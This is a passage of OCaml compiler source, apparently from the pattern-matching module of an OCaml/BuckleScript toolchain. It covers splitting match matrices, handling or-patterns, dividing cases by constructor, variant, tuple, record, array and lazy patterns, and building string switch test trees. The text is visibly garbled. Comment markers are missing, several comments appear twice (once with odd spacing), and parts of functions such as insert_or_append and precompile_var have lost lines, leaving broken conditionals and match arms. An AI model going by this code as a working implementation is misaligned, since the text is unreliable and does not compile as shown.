| _ -> cl :: simplify rem
end
| _ -> assert false in
simplify cls
let rec what_is_cases cases = match cases with
| ({pat_desc=Tpat_any} :: _, _) :: rem -> what_is_cases rem
| (({pat_desc=(Tpat_var _|Tpat_or (_,_,_)|Tpat_alias (_,_,_))}::_),_)::_
| (p::_,_)::_ -> p
| [] -> omega
| _ -> assert false
let as_matrix cases = get_mins le_pats (List.map (fun (ps,_) -> ps) cases)
let cons_default matrix raise_num default =
match matrix with
| [] -> default
| _ -> (matrix,raise_num)::default
let default_compat p def =
List.fold_right
(fun (pss,i) r ->
let qss =
List.fold_right
(fun qs r -> match qs with
| q::rem when may_compat p q -> rem::r
| _ -> r)
pss [] in
match qss with
| [] -> r
| _ -> (qss,i)::r)
def []
let rec extract_vars r p = match p.pat_desc with
| Tpat_var (id, _) -> IdentSet.add id r
| Tpat_alias (p, id,_ ) ->
extract_vars (IdentSet.add id r) p
| Tpat_tuple pats ->
List.fold_left extract_vars r pats
| Tpat_record (lpats,_) ->
List.fold_left
(fun r (_, _, p) -> extract_vars r p)
r lpats
| Tpat_construct (_, _, pats) ->
List.fold_left extract_vars r pats
| Tpat_array pats ->
List.fold_left extract_vars r pats
| Tpat_variant (_,Some p, _) -> extract_vars r p
| Tpat_lazy p -> extract_vars r p
| Tpat_or (p,_,_) -> extract_vars r p
| Tpat_constant _|Tpat_any|Tpat_variant (_,None,_) -> r
exception Cannot_flatten
let mk_alpha_env arg aliases ids =
List.map
(fun id -> id,
if List.mem id aliases then
match arg with
| Some v -> v
| _ -> raise Cannot_flatten
else
Ident.create (Ident.name id))
ids
let rec explode_or_pat arg patl mk_action rem vars aliases = function
| {pat_desc = Tpat_or (p1,p2,_)} ->
explode_or_pat
arg patl mk_action
(explode_or_pat arg patl mk_action rem vars aliases p2)
vars aliases p1
| {pat_desc = Tpat_alias (p,id, _)} ->
explode_or_pat arg patl mk_action rem vars (id::aliases) p
| {pat_desc = Tpat_var (x, _)} ->
let env = mk_alpha_env arg (x::aliases) vars in
(omega::patl,mk_action (List.map snd env))::rem
| p ->
let env = mk_alpha_env arg aliases vars in
(alpha_pat env p::patl,mk_action (List.map snd env))::rem
let pm_free_variables {cases=cases} =
List.fold_right
(fun (_,act) r -> IdentSet.union (free_variables act) r)
cases IdentSet.empty
let pat_as_constr = function
| {pat_desc=Tpat_construct (_, cstr,_)} -> cstr
| _ -> fatal_error "Matching.pat_as_constr"
let group_constant = function
| {pat_desc= Tpat_constant _} -> true
| _ -> false
and group_constructor = function
| {pat_desc = Tpat_construct (_,_,_)} -> true
| _ -> false
and group_variant = function
| {pat_desc = Tpat_variant (_, _, _)} -> true
| _ -> false
and group_var = function
| {pat_desc=Tpat_any} -> true
| _ -> false
and group_tuple = function
| {pat_desc = (Tpat_tuple _|Tpat_any)} -> true
| _ -> false
and group_record = function
| {pat_desc = (Tpat_record _|Tpat_any)} -> true
| _ -> false
and group_array = function
| {pat_desc=Tpat_array _} -> true
| _ -> false
and group_lazy = function
| {pat_desc = Tpat_lazy _} -> true
| _ -> false
let get_group p = match p.pat_desc with
| Tpat_any -> group_var
| Tpat_constant _ -> group_constant
| Tpat_construct _ -> group_constructor
| Tpat_tuple _ -> group_tuple
| Tpat_record _ -> group_record
| Tpat_array _ -> group_array
| Tpat_variant (_,_,_) -> group_variant
| Tpat_lazy _ -> group_lazy
| _ -> fatal_error "Matching.get_group"
let is_or p = match p.pat_desc with
| Tpat_or _ -> true
| _ -> false
let conda p q = not (may_compat p q)
and condb act ps qs = not (is_guarded act) && Parmatch.le_pats qs ps
let or_ok p ps l =
List.for_all
(function
| ({pat_desc=Tpat_or _} as q::qs,act) ->
conda p q || condb act ps qs
| _ -> true)
l
let equiv_pat p q = le_pat p q && le_pat q p
let rec get_equiv p l = match l with
| (q::_,_) as cl::rem ->
if equiv_pat p q then
let others,rem = get_equiv p rem in
cl::others,rem
else
[],l
| _ -> [],l
let insert_or_append p ps act ors no =
let rec attempt seen = function
| (q::qs,act_q) as cl::rem ->
if is_or q then begin
if may_compat p q then
if
IdentSet.is_empty (extract_vars IdentSet.empty p) &&
IdentSet.is_empty (extract_vars IdentSet.empty q) &&
equiv_pat p q
let _, not_e = get_equiv q rem in
if
(fun cl -> match cl with
| (q::_,_) -> not (may_compat p q)
| _ -> assert false)
seen
List.rev_append seen ((p::ps,act)::cl::rem), no
ors,(p::ps,act)::no
attempt (cl::seen) rem
else
ors,(p::ps,act)::no
attempt (cl::seen) rem
attempt (cl::seen) rem
attempt [] ors
Reconstruct default information from half_compiled pm list
let rec rebuild_matrix pmh = match pmh with
| Pm pm -> as_matrix pm.cases
| PmOr {or_matrix=m} -> m
| PmVar x -> add_omega_column (rebuild_matrix x.inside)
let rec rebuild_default nexts def = match nexts with
| [] -> def
| (e, pmh)::rem ->
(add_omega_column (rebuild_matrix pmh), e)::
rebuild_default rem def
let rebuild_nexts arg nexts k =
List.fold_right
(fun (e, pm) k -> (e, PmVar {inside=pm ; var_arg=arg})::k)
nexts k
Split a matching .
Splitting is first directed by or - patterns , then by
tests ( e.g. constructors)/variable transitions .
The approach is greedy , every split function attempts to
raise rows as much as possible in the top matrix ,
then splitting applies again to the remaining rows .
Some precompilation of or - patterns and
variable pattern occurs . Mostly this means that bindings
are performed now , being replaced by let - bindings
in actions ( cf . simplify_cases ) .
Additionally , if the match argument is a variable , matchings whose
first column is made of variables only are splitted further
( cf . precompile_var ) .
Split a matching.
Splitting is first directed by or-patterns, then by
tests (e.g. constructors)/variable transitions.
The approach is greedy, every split function attempts to
raise rows as much as possible in the top matrix,
then splitting applies again to the remaining rows.
Some precompilation of or-patterns and
variable pattern occurs. Mostly this means that bindings
are performed now, being replaced by let-bindings
in actions (cf. simplify_cases).
Additionally, if the match argument is a variable, matchings whose
first column is made of variables only are splitted further
(cf. precompile_var).
*)
let rec split_or argo cls args def =
let cls = simplify_cases args cls in
let rec do_split before ors no = function
| [] ->
cons_next
(List.rev before) (List.rev ors) (List.rev no)
| ((p::ps,act) as cl)::rem ->
if up_ok cl no then
if is_or p then
let ors, no = insert_or_append p ps act ors no in
do_split before ors no rem
else begin
if up_ok cl ors then
do_split (cl::before) ors no rem
else if or_ok p ps ors then
do_split before (cl::ors) no rem
else
do_split before ors (cl::no) rem
end
else
do_split before ors (cl::no) rem
| _ -> assert false
and cons_next yes yesor = function
| [] ->
precompile_or argo yes yesor args def []
| rem ->
let {me=next ; matrix=matrix ; top_default=def},nexts =
do_split [] [] [] rem in
let idef = next_raise_count () in
precompile_or
argo yes yesor args
(cons_default matrix idef def)
((idef,next)::nexts) in
do_split [] [] [] cls
Ultra - naive splitting , close to semantics , used for extension ,
as potential rebind prevents any kind of optimisation
as potential rebind prevents any kind of optimisation *)
and split_naive cls args def k =
let rec split_exc cstr0 yes = function
| [] ->
let yes = List.rev yes in
{ me = Pm {cases=yes; args=args; default=def;} ;
matrix = as_matrix yes ;
top_default=def},
k
| (p::_,_ as cl)::rem ->
if group_constructor p then
let cstr = pat_as_constr p in
if cstr = cstr0 then split_exc cstr0 (cl::yes) rem
else
let yes = List.rev yes in
let {me=next ; matrix=matrix ; top_default=def}, nexts =
split_exc cstr [cl] rem in
let idef = next_raise_count () in
let def = cons_default matrix idef def in
{ me = Pm {cases=yes; args=args; default=def} ;
matrix = as_matrix yes ;
top_default = def; },
(idef,next)::nexts
else
let yes = List.rev yes in
let {me=next ; matrix=matrix ; top_default=def}, nexts =
split_noexc [cl] rem in
let idef = next_raise_count () in
let def = cons_default matrix idef def in
{ me = Pm {cases=yes; args=args; default=def} ;
matrix = as_matrix yes ;
top_default = def; },
(idef,next)::nexts
| _ -> assert false
and split_noexc yes = function
| [] -> precompile_var args (List.rev yes) def k
| (p::_,_ as cl)::rem ->
if group_constructor p then
let yes= List.rev yes in
let {me=next; matrix=matrix; top_default=def;},nexts =
split_exc (pat_as_constr p) [cl] rem in
let idef = next_raise_count () in
precompile_var
args yes
(cons_default matrix idef def)
((idef,next)::nexts)
else split_noexc (cl::yes) rem
| _ -> assert false in
match cls with
| [] -> assert false
| (p::_,_ as cl)::rem ->
if group_constructor p then
split_exc (pat_as_constr p) [cl] rem
else
split_noexc [cl] rem
| _ -> assert false
and split_constr cls args def k =
let ex_pat = what_is_cases cls in
match ex_pat.pat_desc with
| Tpat_any -> precompile_var args cls def k
| Tpat_construct (_,{cstr_tag=Cstr_extension _},_) ->
split_naive cls args def k
| _ ->
let group = get_group ex_pat in
let rec split_ex yes no = function
| [] ->
let yes = List.rev yes and no = List.rev no in
begin match no with
| [] ->
{me = Pm {cases=yes ; args=args ; default=def} ;
matrix = as_matrix yes ;
top_default = def},
k
| cl::rem ->
begin match yes with
| [] ->
split_noex [cl] [] rem
| _ ->
let {me=next ; matrix=matrix ; top_default=def}, nexts =
split_noex [cl] [] rem in
let idef = next_raise_count () in
let def = cons_default matrix idef def in
{me = Pm {cases=yes ; args=args ; default=def} ;
matrix = as_matrix yes ;
top_default = def },
(idef, next)::nexts
end
end
| (p::_,_) as cl::rem ->
if group p && up_ok cl no then
split_ex (cl::yes) no rem
else
split_ex yes (cl::no) rem
| _ -> assert false
and split_noex yes no = function
| [] ->
let yes = List.rev yes and no = List.rev no in
begin match no with
| [] -> precompile_var args yes def k
| cl::rem ->
let {me=next ; matrix=matrix ; top_default=def}, nexts =
split_ex [cl] [] rem in
let idef = next_raise_count () in
precompile_var
args yes
(cons_default matrix idef def)
((idef,next)::nexts)
end
| [ps,_ as cl]
when List.for_all group_var ps && yes <> [] ->
split_noex yes (cl::no) []
| (p::_,_) as cl::rem ->
if not (group p) && up_ok cl no then
split_noex (cl::yes) no rem
else
split_noex yes (cl::no) rem
| _ -> assert false in
match cls with
| ((p::_,_) as cl)::rem ->
if group p then split_ex [cl] [] rem
else split_noex [cl] [] rem
| _ -> assert false
and precompile_var args cls def k = match args with
| [] -> assert false
| _::((Lvar v as av,_) as arg)::rargs ->
begin match cls with
dont_precompile_var args cls def k
| _ ->
let var_cls =
List.map
(fun (ps,act) -> match ps with
| _::ps -> ps,act | _ -> assert false)
cls
and var_def = make_default (fun _ rem -> rem) def in
let {me=first ; matrix=matrix}, nexts =
split_or (Some v) var_cls (arg::rargs) var_def in
match nexts with
dont_precompile_var args cls def k
| _ ->
let rfirst =
{me = PmVar {inside=first ; var_arg = av} ;
matrix = add_omega_column matrix ;
top_default = rebuild_default nexts def ; }
and rnexts = rebuild_nexts av nexts k in
rfirst, rnexts
end
| _ ->
dont_precompile_var args cls def k
and dont_precompile_var args cls def k =
{me = Pm {cases = cls ; args = args ; default = def } ;
matrix=as_matrix cls ;
top_default=def},k
and precompile_or argo cls ors args def k = match ors with
| [] -> split_constr cls args def k
| _ ->
let rec do_cases = function
| ({pat_desc=Tpat_or _} as orp::patl, action)::rem ->
let others,rem = get_equiv orp rem in
let orpm =
{cases =
(patl, action)::
List.map
(function
| (_::ps,action) -> ps,action
| _ -> assert false)
others ;
args = (match args with _::r -> r | _ -> assert false) ;
default = default_compat orp def} in
let vars =
IdentSet.elements
(IdentSet.inter
(extract_vars IdentSet.empty orp)
(pm_free_variables orpm)) in
let or_num = next_raise_count () in
let new_patl = Parmatch.omega_list patl in
let mk_new_action vs =
Lstaticraise
(or_num, List.map (fun v -> Lvar v) vs) in
let body,handlers = do_cases rem in
explode_or_pat
argo new_patl mk_new_action body vars [] orp,
let mat = [[orp]] in
((mat, or_num, vars , orpm):: handlers)
| cl::rem ->
let new_ord,new_to_catch = do_cases rem in
cl::new_ord,new_to_catch
| [] -> [],[] in
let end_body, handlers = do_cases ors in
let matrix = as_matrix (cls@ors)
and body = {cases=cls@end_body ; args=args ; default=def} in
{me = PmOr {body=body ; handlers=handlers ; or_matrix=matrix} ;
matrix=matrix ;
top_default=def},
k
let split_precompile argo pm =
let {me=next}, nexts = split_or argo pm.cases pm.args pm.default in
if dbg && (nexts <> [] || (match next with PmOr _ -> true | _ -> false))
then begin
prerr_endline "** SPLIT **" ;
pretty_pm pm ;
pretty_precompiled_res next nexts
end ;
next, nexts
let add_line patl_action pm = pm.cases <- patl_action :: pm.cases; pm
type cell =
{pm : pattern_matching ;
ctx : ctx list ;
pat : pattern}
let add make_matching_fun division eq_key key patl_action args =
try
let (_,cell) = List.find (fun (k,_) -> eq_key key k) division in
cell.pm.cases <- patl_action :: cell.pm.cases;
division
with Not_found ->
let cell = make_matching_fun args in
cell.pm.cases <- [patl_action] ;
(key, cell) :: division
let divide make eq_key get_key get_args ctx pm =
let rec divide_rec = function
| (p::patl,action) :: rem ->
let this_match = divide_rec rem in
add
(make p pm.default ctx)
this_match eq_key (get_key p) (get_args p patl,action) pm.args
| _ -> [] in
divide_rec pm.cases
let divide_line make_ctx make get_args pat ctx pm =
let rec divide_rec = function
| (p::patl,action) :: rem ->
let this_match = divide_rec rem in
add_line (get_args p patl, action) this_match
| _ -> make pm.default pm.args in
{pm = divide_rec pm.cases ;
ctx=make_ctx ctx ;
pat=pat}
Then come various functions ,
There is one set of functions per matching style
( constants , constructors etc . )
- matcher functions are arguments to ( for default handlers )
They may raise NoMatch or and perform the full
matching ( selection + arguments ) .
- get_args and get_key are for the compiled matrices , note that
selection and getting arguments are separated .
- make _ _ matching combines the previous functions for producing
new ` ` pattern_matching '' records .
There is one set of functions per matching style
(constants, constructors etc.)
- matcher functions are arguments to make_default (for default handlers)
They may raise NoMatch or OrPat and perform the full
matching (selection + arguments).
- get_args and get_key are for the compiled matrices, note that
selection and getting arguments are separated.
- make_ _matching combines the previous functions for producing
new ``pattern_matching'' records.
*)
let rec matcher_const cst p rem = match p.pat_desc with
| Tpat_or (p1,p2,_) ->
begin try
matcher_const cst p1 rem with
| NoMatch -> matcher_const cst p2 rem
end
| Tpat_constant c1 when const_compare c1 cst = 0 -> rem
| Tpat_any -> rem
| _ -> raise NoMatch
let get_key_constant caller = function
| {pat_desc= Tpat_constant cst} -> cst
| p ->
prerr_endline ("BAD: "^caller) ;
pretty_pat p ;
assert false
let get_args_constant _ rem = rem
let make_constant_matching p def ctx = function
[] -> fatal_error "Matching.make_constant_matching"
| (_ :: argl) ->
let def =
make_default
(matcher_const (get_key_constant "make" p)) def
and ctx =
filter_ctx p ctx in
{pm = {cases = []; args = argl ; default = def} ;
ctx = ctx ;
pat = normalize_pat p}
let divide_constant ctx m =
divide
make_constant_matching
(fun c d -> const_compare c d = 0) (get_key_constant "divide")
get_args_constant
ctx m
let make_field_args ~fld_info loc binding_kind arg first_pos last_pos argl =
let rec make_args pos =
if pos > last_pos
then argl
else (Lprim(Pfield (pos, fld_info), [arg], loc), binding_kind) :: make_args (pos + 1)
in make_args first_pos
let get_key_constr = function
| {pat_desc=Tpat_construct (_, cstr,_)} -> cstr.cstr_tag
| _ -> assert false
let get_args_constr p rem = match p with
| {pat_desc=Tpat_construct (_, _, args)} -> args @ rem
| _ -> assert false
NB : matcher_constr applies to default matrices .
In that context , matching by constructors of extensible
types degrades to arity checking , due to potential rebinding .
This comparison is performed by Types.may_equal_constr .
In that context, matching by constructors of extensible
types degrades to arity checking, due to potential rebinding.
This comparison is performed by Types.may_equal_constr.
*)
let matcher_constr cstr = match cstr.cstr_arity with
| 0 ->
let rec matcher_rec q rem = match q.pat_desc with
| Tpat_or (p1,p2,_) ->
begin
try matcher_rec p1 rem
with NoMatch -> matcher_rec p2 rem
end
| Tpat_construct (_, cstr',[])
when Types.may_equal_constr cstr cstr' -> rem
| Tpat_any -> rem
| _ -> raise NoMatch in
matcher_rec
| 1 ->
let rec matcher_rec q rem = match q.pat_desc with
| Tpat_or (p1,p2,_) ->
let r1 = try Some (matcher_rec p1 rem) with NoMatch -> None
and r2 = try Some (matcher_rec p2 rem) with NoMatch -> None in
begin match r1,r2 with
| None, None -> raise NoMatch
| Some r1, None -> r1
| None, Some r2 -> r2
| Some (a1::_), Some (a2::_) ->
{a1 with
pat_loc = Location.none ;
pat_desc = Tpat_or (a1, a2, None)}::
rem
| _, _ -> assert false
end
| Tpat_construct (_, cstr', [arg])
when Types.may_equal_constr cstr cstr' -> arg::rem
| Tpat_any -> omega::rem
| _ -> raise NoMatch in
matcher_rec
| _ ->
fun q rem -> match q.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_construct (_,cstr',args)
when Types.may_equal_constr cstr cstr' -> args @ rem
| Tpat_any -> Parmatch.omegas cstr.cstr_arity @ rem
| _ -> raise NoMatch
let is_not_none_bs_primitve : Lambda.primitive =
Pccall
(Primitive.simple ~name:"#is_not_none" ~arity:1 ~alloc:false)
let val_from_option_bs_primitive : Lambda.primitive =
Pccall
(Primitive.simple ~name:"#val_from_option" ~arity:1 ~alloc:true)
let val_from_unnest_option_bs_primitive : Lambda.primitive =
Pccall
(Primitive.simple ~name:"#val_from_unnest_option" ~arity:1 ~alloc:true)
let make_constr_matching p def ctx = function
[] -> fatal_error "Matching.make_constr_matching"
| ((arg, _mut) :: argl) ->
let cstr = pat_as_constr p in
let newargs =
if cstr.cstr_inlined <> None then
(arg, Alias) :: argl
else match cstr.cstr_tag with
| Cstr_block _ when
!Config.bs_only &&
Datarepr.constructor_has_optional_shape cstr
->
begin
let from_option =
match p.pat_desc with
| Tpat_construct(_, _,
[ {
pat_type ; pat_env
} ])
when Typeopt.cannot_inhabit_none_like_value pat_type pat_env
-> val_from_unnest_option_bs_primitive
| _ -> val_from_option_bs_primitive in
(Lprim (from_option, [arg], p.pat_loc), Alias) :: argl
end
| Cstr_constant _
| Cstr_block _ ->
make_field_args p.pat_loc Alias arg 0 (cstr.cstr_arity - 1) argl
~fld_info:(if cstr.cstr_name = "::" then Fld_cons else Fld_variant)
| Cstr_unboxed -> (arg, Alias) :: argl
| Cstr_extension _ ->
make_field_args p.pat_loc Alias arg 1 cstr.cstr_arity argl
~fld_info:Fld_extension
in
{pm=
{cases = []; args = newargs;
default = make_default (matcher_constr cstr) def} ;
ctx = filter_ctx p ctx ;
pat=normalize_pat p}
let divide_constructor ctx pm =
divide
make_constr_matching
Types.equal_tag get_key_constr get_args_constr
ctx pm
let rec matcher_variant_const lab p rem = match p.pat_desc with
| Tpat_or (p1, p2, _) ->
begin
try
matcher_variant_const lab p1 rem
with
| NoMatch -> matcher_variant_const lab p2 rem
end
| Tpat_variant (lab1,_,_) when lab1=lab -> rem
| Tpat_any -> rem
| _ -> raise NoMatch
let make_variant_matching_constant p lab def ctx = function
[] -> fatal_error "Matching.make_variant_matching_constant"
| (_ :: argl) ->
let def = make_default (matcher_variant_const lab) def
and ctx = filter_ctx p ctx in
{pm={ cases = []; args = argl ; default=def} ;
ctx=ctx ;
pat = normalize_pat p}
let matcher_variant_nonconst lab p rem = match p.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_variant (lab1,Some arg,_) when lab1=lab -> arg::rem
| Tpat_any -> omega::rem
| _ -> raise NoMatch
let make_variant_matching_nonconst p lab def ctx = function
[] -> fatal_error "Matching.make_variant_matching_nonconst"
| ((arg, _mut) :: argl) ->
let def = make_default (matcher_variant_nonconst lab) def
and ctx = filter_ctx p ctx in
{pm=
{cases = []; args = (Lprim(Pfield (1, Fld_poly_var_content), [arg], p.pat_loc), Alias) :: argl;
default=def} ;
ctx=ctx ;
pat = normalize_pat p}
let divide_variant row ctx {cases = cl; args = al; default=def} =
let row = Btype.row_repr row in
let rec divide = function
({pat_desc = Tpat_variant(lab, pato, _)} as p:: patl, action) :: rem ->
let variants = divide rem in
if try Btype.row_field_repr (List.assoc lab row.row_fields) = Rabsent
with Not_found -> true
then
variants
else begin
let tag = Btype.hash_variant lab in
let (=) ((a:string),(b:Types.constructor_tag)) (c,d) =
a = c && Types.equal_tag b d
in
match pato with
None ->
add (make_variant_matching_constant p lab def ctx) variants
(=) (lab,Cstr_constant tag) (patl, action) al
| Some pat ->
add (make_variant_matching_nonconst p lab def ctx) variants
(=) (lab,Cstr_block tag) (pat :: patl, action) al
end
| _ -> []
in
divide cl
Three ` ` no - test '' cases
Three ``no-test'' cases
*)
let get_args_var _ rem = rem
let make_var_matching def = function
| [] -> fatal_error "Matching.make_var_matching"
| _::argl ->
{cases=[] ;
args = argl ;
default= make_default get_args_var def}
let divide_var ctx pm =
divide_line ctx_lshift make_var_matching get_args_var omega ctx pm
let get_arg_lazy p rem = match p with
| {pat_desc = Tpat_any} -> omega :: rem
| {pat_desc = Tpat_lazy arg} -> arg :: rem
| _ -> assert false
let matcher_lazy p rem = match p.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_any
| Tpat_var _ -> omega :: rem
| Tpat_lazy arg -> arg :: rem
| _ -> raise NoMatch
let get_mod_field modname field =
lazy (
try
let mod_ident = Ident.create_persistent modname in
let env = Env.open_pers_signature modname Env.initial_safe_string in
let p = try
match Env.lookup_value (Longident.Lident field) env with
| (Path.Pdot(_,_,i), _) -> i
| _ -> fatal_error ("Primitive "^modname^"."^field^" not found.")
with Not_found ->
fatal_error ("Primitive "^modname^"."^field^" not found.")
in
Lprim(Pfield (p, Fld_module {name = field}),
[Lprim(Pgetglobal mod_ident, [], Location.none)],
Location.none)
with Not_found -> fatal_error ("Module "^modname^" unavailable.")
)
let code_force =
get_mod_field "CamlinternalLazy" "force"
;;
inline_lazy_force inlines the beginning of the code of Lazy.force . When
the value argument is tagged as :
- forward , take field 0
- lazy , call the primitive that forces ( without testing again the tag )
- anything else , return it
Using Lswitch below relies on the fact that the GC does not shortcut
Forward(val_out_of_heap ) .
the value argument is tagged as:
- forward, take field 0
- lazy, call the primitive that forces (without testing again the tag)
- anything else, return it
Using Lswitch below relies on the fact that the GC does not shortcut
Forward(val_out_of_heap).
*)
let inline_lazy_force arg loc =
Lapply { ap_func = Lazy.force code_force; ap_inlined = Default_inline; ap_args = [arg]; ap_loc = loc}
let make_lazy_matching def = function
[] -> fatal_error "Matching.make_lazy_matching"
| (arg,_mut) :: argl ->
{ cases = [];
args =
(inline_lazy_force arg Location.none, Strict) :: argl;
default = make_default matcher_lazy def }
let divide_lazy p ctx pm =
divide_line
(filter_ctx p)
make_lazy_matching
get_arg_lazy
p ctx pm
let get_args_tuple arity p rem = match p with
| {pat_desc = Tpat_any} -> omegas arity @ rem
| {pat_desc = Tpat_tuple args} ->
args @ rem
| _ -> assert false
let matcher_tuple arity p rem = match p.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_any
| Tpat_var _ -> omegas arity @ rem
| Tpat_tuple args when List.length args = arity -> args @ rem
| _ -> raise NoMatch
let make_tuple_matching loc arity def = function
[] -> fatal_error "Matching.make_tuple_matching"
| (arg, _mut) :: argl ->
let rec make_args pos =
if pos >= arity
then argl
else (Lprim(Pfield (pos, Fld_tuple), [arg], loc), Alias) :: make_args (pos + 1) in
{cases = []; args = make_args 0 ;
default=make_default (matcher_tuple arity) def}
let divide_tuple arity p ctx pm =
divide_line
(filter_ctx p)
(make_tuple_matching p.pat_loc arity)
(get_args_tuple arity) p ctx pm
let record_matching_line num_fields lbl_pat_list =
let patv = Array.make num_fields omega in
List.iter (fun (_, lbl, pat) -> patv.(lbl.lbl_pos) <- pat) lbl_pat_list;
Array.to_list patv
let get_args_record num_fields p rem = match p with
| {pat_desc=Tpat_any} ->
record_matching_line num_fields [] @ rem
| {pat_desc=Tpat_record (lbl_pat_list,_)} ->
record_matching_line num_fields lbl_pat_list @ rem
| _ -> assert false
let matcher_record num_fields p rem = match p.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_any
| Tpat_var _ ->
record_matching_line num_fields [] @ rem
| Tpat_record ([], _) when num_fields = 0 -> rem
| Tpat_record ((_, lbl, _) :: _ as lbl_pat_list, _)
when Array.length lbl.lbl_all = num_fields ->
record_matching_line num_fields lbl_pat_list @ rem
| _ -> raise NoMatch
let make_record_matching loc all_labels def = function
[] -> fatal_error "Matching.make_record_matching"
| ((arg, _mut) :: argl) ->
let rec make_args pos =
if pos >= Array.length all_labels then argl else begin
let lbl = all_labels.(pos) in
let access =
match lbl.lbl_repres with
| Record_float_unused -> assert false
| Record_regular | Record_optional_labels _ ->
Lprim (Pfield (lbl.lbl_pos, !Lambda.fld_record lbl), [arg], loc)
| Record_inlined _ ->
Lprim (Pfield (lbl.lbl_pos, Fld_record_inline {name = lbl.lbl_name}), [arg], loc)
| Record_unboxed _ -> arg
| Record_extension -> Lprim (Pfield (lbl.lbl_pos + 1, Fld_record_extension {name = lbl.lbl_name}), [arg], loc)
in
let str =
match lbl.lbl_mut with
Immutable -> Alias
| Mutable -> StrictOpt in
(access, str) :: make_args(pos + 1)
end in
let nfields = Array.length all_labels in
let def= make_default (matcher_record nfields) def in
{cases = []; args = make_args 0 ; default = def}
let divide_record all_labels p ctx pm =
let get_args = get_args_record (Array.length all_labels) in
divide_line
(filter_ctx p)
(make_record_matching p.pat_loc all_labels)
get_args
p ctx pm
let get_key_array = function
| {pat_desc=Tpat_array patl} -> List.length patl
| _ -> assert false
let get_args_array p rem = match p with
| {pat_desc=Tpat_array patl} -> patl@rem
| _ -> assert false
let matcher_array len p rem = match p.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_array args when List.length args=len -> args @ rem
| Tpat_any -> Parmatch.omegas len @ rem
| _ -> raise NoMatch
let make_array_matching p def ctx = function
| [] -> fatal_error "Matching.make_array_matching"
| ((arg, _mut) :: argl) ->
let len = get_key_array p in
let rec make_args pos =
if pos >= len
then argl
else (Lprim(Parrayrefu ,
[arg; Lconst(Const_base(Const_int pos))],
p.pat_loc),
StrictOpt) :: make_args (pos + 1) in
let def = make_default (matcher_array len) def
and ctx = filter_ctx p ctx in
{pm={cases = []; args = make_args 0 ; default = def} ;
ctx=ctx ;
pat = normalize_pat p}
let divide_array ctx pm =
divide
make_array_matching
(=) get_key_array get_args_array ctx pm
Specific string test sequence
Will be called by the bytecode compiler , from bytegen.ml .
The strategy is first dichotomic search ( we perform 3 - way tests
with compare_string ) , then sequence of equality tests
when there are less then T = strings_test_threshold static strings to match .
Increasing T entails ( slightly ) less code , decreasing T
( slightly ) favors runtime speed .
T=8 looks a decent tradeoff .
Specific string test sequence
Will be called by the bytecode compiler, from bytegen.ml.
The strategy is first dichotomic search (we perform 3-way tests
with compare_string), then sequence of equality tests
when there are less then T=strings_test_threshold static strings to match.
Increasing T entails (slightly) less code, decreasing T
(slightly) favors runtime speed.
T=8 looks a decent tradeoff.
*)
Utilities
let strings_test_threshold = 8
let prim_string_notequal =
Pccall(Primitive.simple
~name:"caml_string_notequal"
~arity:2
~alloc:false)
let prim_string_compare =
Pccall(Primitive.simple
~name:"caml_string_compare"
~arity:2
~alloc:false)
let bind_sw arg k = match arg with
| Lvar _ -> k arg
| _ ->
let id = Ident.create "switch" in
Llet (Strict,Pgenval,id,arg,k (Lvar id))
let make_string_test_sequence loc arg sw d =
let d,sw = match d with
| None ->
begin match sw with
| (_,d)::sw -> d,sw
| [] -> assert false
end
| Some d -> d,sw in
bind_sw arg
(fun arg ->
List.fold_right
(fun (s,lam) k ->
Lifthenelse
(Lprim
(prim_string_notequal,
[arg; Lconst (Const_immstring s)], loc),
k,lam))
sw d)
let rec split k xs = match xs with
| [] -> assert false
| x0::xs ->
if k <= 1 then [],x0,xs
else
let xs,y0,ys = split (k-2) xs in
x0::xs,y0,ys
let zero_lam = Lconst (Const_base (Const_int 0))
let tree_way_test loc arg lt eq gt =
Lifthenelse
(Lprim (Pintcomp Clt,[arg;zero_lam], loc),lt,
Lifthenelse(Lprim (Pintcomp Clt,[zero_lam;arg], loc),gt,eq))
let rec do_make_string_test_tree loc arg sw delta d =
let len = List.length sw in
if len <= strings_test_threshold+delta then
make_string_test_sequence loc arg sw d
else
let lt,(s,act),gt = split len sw in
bind_sw
(Lprim
(prim_string_compare,
[arg; Lconst (Const_immstring s)], loc))
(fun r ->
tree_way_test loc r
(do_make_string_test_tree loc arg lt delta d)
act
(do_make_string_test_tree loc arg gt delta d))
let expand_stringswitch loc arg sw d = match d with
| None ->
bind_sw arg
(fun arg -> do_make_string_test_tree loc arg sw 0 None)
| Some e ->
bind_sw arg
(fun arg ->
make_catch e
(fun d -> do_make_string_test_tree loc arg sw 1 (Some d)))
Generic test trees
Sharing
let handle_shared () =
let hs = ref (fun x -> x) in
let handle_shared act = match act with
| Switch.Single act -> act
| Switch.Shared act ->
let i,h = make_catch_delayed act in
let ohs = !hs in
hs := (fun act -> h (ohs act)) ;
make_exit i in
hs,handle_shared
let share_actions_tree sw d =
let store = StoreExp.mk_store () in
let d =
match d with
| None -> None
| Some d -> Some (store.Switch.act_store_shared d) in
let sw =
List.map (fun (cst,act) -> cst,store.Switch.act_store act) sw in
let acts = store.Switch.act_get_shared () in
let hs,handle_shared = handle_shared () in
let acts = Array.map handle_shared acts in
let d = match d with
| None -> None
| Some d -> Some (acts.(d)) in
let sw = List.map (fun (cst,j) -> cst,acts.(j)) sw in
!hs,sw,d
let rec uniq_lambda_list sw = match sw with
| []|[_] -> sw
| (c1,_ as p1)::((c2,_)::sw2 as sw1) ->
if const_compare c1 c2 = 0 then uniq_lambda_list (p1::sw2)
else p1::uniq_lambda_list sw1
let sort_lambda_list l =
let l =
List.stable_sort (fun (x,_) (y,_) -> const_compare x y) l in
uniq_lambda_list l
let rec cut n l =
if n = 0 then [],l
else match l with
[] -> raise (Invalid_argument "cut")
| a::l -> let l1,l2 = cut (n-1) l in a::l1, l2
let rec do_tests_fail loc fail tst arg = function
| [] -> fail
| (c, act)::rem ->
Lifthenelse
(Lprim (tst, [arg ; Lconst (Const_base c)], loc),
do_tests_fail loc fail tst arg rem,
act)
let rec do_tests_nofail loc tst arg = function
| [] -> fatal_error "Matching.do_tests_nofail"
| [_,act] -> act
| (c,act)::rem ->
Lifthenelse
(Lprim (tst, [arg ; Lconst (Const_base c)], loc),
